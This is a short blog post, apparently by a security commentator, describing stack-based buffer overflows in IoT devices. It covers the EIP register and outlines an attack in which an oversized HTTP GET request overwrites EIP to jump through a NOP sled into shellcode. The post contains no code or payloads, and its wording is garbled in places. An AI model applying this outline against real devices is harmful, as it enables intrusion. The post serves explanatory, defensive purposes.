Stack-based buffer overflow – the biggest enemy of IoT world

Preface:ASLR, NX Zones, and Stack Canaries is hard to avoid such memory design weakness exploit by malware authors.

Background: EIP is a register in x86 architectures (32bit). It is a register that points to the next instruction. In order to avoid malware infiltration. How to keep track of memory location when instructions that are being executed is very important.The EIP register cannot be accessed directly by software; it is controlled implicitly by control-transfer instructions (such as JMP, Jcc, CALL, and RET), interrupts, and exceptions. The only way to read the EIP register is to execute a CALL instruction and then read the value of the return instruction pointer from the procedure stack.

Potential cyber attack: Refer to diagram,the malware listens on TCP port 80, sending an HTTP GET request with 300 or more bytes will trigger buffer overflow overwriting EIP. When malware reach the EIP and overwrite it with a new address that points to his shell code, then it will add something called NOP (No Operation) , then finally the shellcode. And breakdown everything espcially access control of priviliges.

Status: under observation.

Leave a Reply

Your email address will not be published.

This site uses Akismet to reduce spam. Learn how your comment data is processed.